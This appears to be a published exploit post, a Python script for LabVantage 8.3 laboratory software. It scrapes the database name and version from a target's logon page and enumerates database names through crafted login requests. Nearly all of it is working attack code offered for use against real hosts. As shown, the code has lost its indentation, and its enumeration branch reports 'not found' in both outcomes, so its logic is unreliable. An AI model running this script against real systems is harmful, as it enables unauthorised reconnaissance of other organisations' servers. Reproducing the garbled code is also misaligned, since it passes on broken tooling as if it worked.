Share
# Exploit Title: LabVantage 8.3 - Information Disclosure  
# Google Dork: N/A  
# Date: 2020-02-16  
# Exploit Author: Joel Aviad Ossi  
# Vendor Homepage: labvantage.com  
# Software Link: N/A  
# Version: LabVantage 8.3  
# Tested on: *  
# CVE : N/A  
  
  
import requests  
import operator  
  
  
def exploit(target):  
print("[+] Fetching LabVantage Database Name..")  
start = "name=\"database\" id=\"database\" value=\""  
end = "\" >"  
vstart = "<img src=\"WEB-OPAL/layouts/images/logo_white.png\" title=\""  
vend = "viewportTest"  
print("[+] Testing URL: " + target)  
r = requests.get(target)  
memory = r.text  
print("[+] DB: " + memory[memory.find(start) + len(start):memory.rfind(end)])  
print("[+] VERSION: " + memory[memory.find(vstart) + len(vstart):memory.rfind(vend)][:-71])  
print("[+] Vulnerable!")  
  
  
def vuln_check():  
target = input("\nTARGET HOST URL (example: target.com:8080): ")  
print('[+] Checking if Host is vulnerable.')  
target = (str(target) + "/labservices/logon.jsp")  
r = requests.get(target)  
memory = r.text  
s = "name=\"database\" id=\"database\" value=\""  
if not operator.contains(memory, s):  
print("[-] Not Vulnerable!")  
exit(0)  
else:  
exploit(target)  
  
  
def attack():  
target = input("\nTARGET HOST URL (example: http://target.com:8080): ")  
enum = input("\nDB NAME TO CHECK: ")  
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0',  
'Content-Type': 'application/x-www-form-urlencoded'}  
payload = ({'nexturl': 'null', 'ignorelogonurl': 'N', 'ignoreexpirywarning': 'false',  
'_viewport': 'null', 'username': 'null', 'password': 'null',  
'database': ''+str(enum)+'', 'csrftoken': 'null'})  
target = (str(target) + "/labservices/rc?command=login")  
print("[+] Testing URL: " + target)  
r = requests.post(target, headers=headers, data=payload)  
memory = r.text  
start = "Unrecognized"  
if start in memory:  
print('[+] DB NOT FOUND!')  
else:  
print('[!] NO FOUND!')  
  
  
print("\n1. Vulnerability Check\n2. DB Name Enumeration\n")  
option = input("CHOSE OPTION: ")  
if option == "1":  
vuln_check()  
elif option == "2":  
attack()  
else:  
print("Wrong option selected, try again!")